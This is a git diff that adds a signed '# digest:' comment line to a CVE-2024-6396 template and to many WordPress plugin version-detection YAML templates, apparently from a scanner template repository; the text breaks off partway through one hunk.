http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/cves/2024/CVE-2024-6396.yaml b/http/cves/2024/CVE-2024-6396.yaml index 34ca5ffad5..228f0dde00 100644 --- a/http/cves/2024/CVE-2024-6396.yaml +++ b/http/cves/2024/CVE-2024-6396.yaml @@ -66,3 +66,4 @@ http: part: header_3 words: - "text/plain" +# digest: 4a0a0047304502210099850e1d327c893d635d886887be1e40781e8445214740edc611fb8a68e2533702206e55b076166d6c86edc822570a65c3ab7bdf8da82596df934cc65157141dcfb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..abaf3eff08 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f36c560f74676f791f1934da3e3fa2a1c34045ba97b7cb378f6da7118e1372f5022007f4901c1254dbe0ea148b66aeda99bde7c358a4e8ae6914cd6aa459c03d00b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..b1906e5aad 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022047b773e54b7d2133d0d0a410d1af46f4040e06e6117e1aaf3a95d0d69997c53102203b01dcf3bbf908b9abe4da67f2a9e9a0ed22ab9150241be31cceefa91ea2f015:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..11f16d7668 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ce33574e3b018b75d389fee9fd3636b5aece92b5e58066a53bc43324c9dd57a022012815c05d76395e0c8f9b873d4552fb60b841e9472f8f26219c3fcdc3ecdb697:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..cb2983c073 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f90b5c64f5e2ba5400e345f2353252f8e98caac3c2cb1efce0a55e06d9cf430702204c18646406c16f03608d01b9371e1081844c8014a696f3323d212b6409506c5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..3366903de9 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203a6f0c7df79a258c742fa868a964e4d46b86919a8f39c7cf64ca675cd14e819e0220344e033ed04d94404ef0949f46cd8fa71098cf8fdcbb53d9e9816fba491214bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..78d761be00 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220330d517911db2bc4a00124e36e514a002d8b4b0b637cc8d21b1784fe0e6ed24e0221009cdc038f99a2261a42cb4439b895391b8fa3425a9fc424a8d7629e81d56166c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..e8975d69e2 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f2b34731b9796a79058fc0d2e1d69d4f513380815ab86f9e45c880f0bc31a3550220057119ebd81bf898e2e82519d16dd291266a88f231e4b8292c8066da7ce04de8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..d043e89fc2 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a621799f480dc9d982f6aef8eeeccefeda6dea8b96d7fdebb8222431fe45b8ef022100896a5f6c53544a89128a7b1b67692a28789ab443f1b110407b8722a6c89fb8b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..357efc2f1f 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202e739a62b48fbd873d766243f85310b8e9c048817c16e45cb6e291f2facbb41302202120965ec8596a5d028c5a500e2b77d45e5946a3cd55dcc75ededef61a616b70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..097410bc96 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022045ef2ea384c7b3f098ed5fcda2db643c76e4a4b563cb667ab6000511dfd1bf6b022018451c7b800c7bfac41fe3f50ff82f70b557c7fc0637e26902423c7322ff00c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..ed64942e0c 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ec5fc96a9c62987b9914f1748ba08f441cd5c72a2d13b80e11d3230800e43ff90221009554c7e89e0f62d841c998c0313bf3bc79dfabee85db79f39037d5c32fa5d14b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..cc6d0f3b93 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aeedc10cdba61c2286e89cb8182a37c95ee8157a342aa873c1ce5005346446460220453a05274572ba573b4691cab5ea826c0c3d202f56f0a6ebeb7e83df09927744:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..7975142a74 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210080833f0a6f6965bf701a9f8f85c42f13aced2edfa3c92f35b7bf9b2949f30c92022010f4ca3a59b6d406300c386db8a6df73c29dbe232100869a5813747db8f85ee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..207bf964b4 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f1d2f7f6be6fddf20850b4703b6ab5b8d957c3e74b071534c1bc6ad7fe41436502202a71f99ce82762f27add68abbe7a23d4240623238e94b985bfca1ee61f0d6da8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..c79da31bb6 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205c5109cf3bacc2b8cc218a17cfe92ee3fe4d72de8ac73e91373f19d9b8c3d31b0220238301247108e18a2cba0ed47c36b28c5c8faecfd5240ec31685b0d90441bd88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..cb2878e9ad 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203e53d59041d41a70647f545a55fcfdff1cdbc2a49aadf9b5f659ae93371918d50220098775c59e3b87e6be78842156c7241c18d7a0b357642133f15f77be8d7cab55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..9a4f30a2f4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a1ddd14f6387bf2982f4bce8fbc3a4947b77511c0efeab680f998557dd7fe530022004d54454b173b3799de58a0775b79229217011002c27b5e37f88e9c4153b93b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..cd27b76ea3 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220199adf3dca06dbafdf15f58c0e059c580c690a47298d88590d067df01557fe3e022100bb1480a6c06a9560a4d844220066a6513f5332c08eff31695cd0d53e308d17f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..9e93023871 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d8bf8d7d16e101d6da570588e7d4bda90f3928c5b700764a4e8ac07ca18ae480022100e11a1d19fccc35366ea3bd589f834d04b6ec9ca887e3418c8e53a82ee433cd40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..5273620995 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200cfe429a4d25d4c22eb6a61b7b52d17ebe6c552dd47c64b762c5794e6f97adee0220686ef471e2c5d52316f84fbd116e2399d3593896d23ba69b8dbb1a512672f4f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..d4ca5b8686 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c01646b0575cf57b2cb4501545ed40118eaacea85bcd059deb9ca88cab465cbd022100ef8a8c51ab8767a3f508b14e58f2398285c81a59f4ce9db52471230d7580d406:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..1698aa1627 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022032b67759d95061453c79b65aae1ce69db442ef30e8c3862cefc1fbe2330af108022100e6254d64680e63f7d2d8a7f7af20e6ef835244a4b1c44b2fbb88d6bdd4705a0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..2f33e43805 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fbbca3ca6c09d499a91c098066a03d7f924acb85fe36cc16576ac9e094ac6a2f022100933b104bbfea964358b544b4d3f7d430eb5a36fac2ebe8b092fa17a7c9e469d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..6966401293 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200a4a26539eb02e22d38401adebe67d953400c3c14e580580d4a8fc3d754ecfcd022100c25d7740d7c685f9e94fbdca6ff1d44d10c350b9f1c81bed889328c190d86f49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..d7a9148cad 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c99ce9c2661bdd54d56574864437371d73ab0e3428fa01c6c97b59f4967c5571022100adefcdc30c2ea9fc724bd55cd401ac2cac54da31c66a6220d55be63f65540162:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..7f1a05d4fe 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203319cae360469622929a306469361144fb7009f1ec8dd83b0f2c4379d37f28d2022100aa505c450bde75b22e385ee558457c15e2a6b76f9411e9c1c9fab8f7ab057081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..5c5b8e120d 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a496713fca262e4114aa39459f8d553dde5950316e7bba69b3cc4c620faadfdf0220206948c12de5016492989f912f1c7bdda92ac1c382d195d4ef4b71278bb4062d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..01f0558f86 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100acb053fe0a5bfb3aabcd385031058e4b026062054f7be3a2738de05c99fd8cc702210083c1906b99db11b71208f89de95811f00e1f5605d11dfaed947b338b72408fe2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..aedf03c630 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220706cafe45eb4aafb06ccd9303881494059a06ba5475496cca5464505fd1f57f5022003579197521eaf3e883b42b82cbc71de9317d459db82a1e999fee877229937a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..a4d81b8fc5 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100928cc763b02f807158b7e3774309ded6bc41cee14f18e816d5aa7971d72303aa0221008efd26b1804b4e3a554830db5f5258ac20ee5a7fca4f699de709c9d06eb6e76c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..d2d917a53c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220362d55eacd4e0529ccbcd5c2cc6409c896fbcbe11098945c7a7effa5942ece34022100ea08980ed018f320b620f6a38a225db823f964221f68d98345406d6212596a89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..7a4b8307d7 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e2103855103fa095a6a057a621f43f85536b8711147339f17b8a8166d6b704b0220173a7844f0a3b8f36a51940aec38b4f7f9db0e8cdc517786bdba50a446442840:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..ba53209246 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bb5b9bf4cddc55618adc2637ef5bab88dd83ed99f9c241cf947df4baf73ff4de02210088084bd1099c88dc0d1ecdae1b879ee7ddc22cd559a39ed6a0b6592e487f11a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..3ea8b64b2c 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e160202a9722fcc926977cde9aec31160b512981d9104f157c15844394c211b5022036c9664ae6bb1f496f8f19744ff9a3f22641aaac7a9f24f1527818e0cf00f74e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..e337b0035f 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f30a511bb4cb04fc0d2904238befde7f653d65db079c31038586a084059953b3022001424a080669776cd9b03feddfc4d1d2029642a01b61d97b5845e2d01359ba50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..799aad653f 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206a2b8804e1cd5e7e40a434cfad3563d07e88e23891b307e90565da0c8ab4557a02207054488675272bd7d60e9dcab6bdf45610e6d1bc5955611d4ef802ec81c4ec3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..9f6c10f69c 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220756ba6b0e0f30dbeb081bf7c46eeeb63ebb1c2c315075eed2f5ee63b08d0b072022100f50d24aeb7f09b5ac704a3f9ceded626e91d40be83d746eff7a486858c08de8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..4b9385d4ad 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ 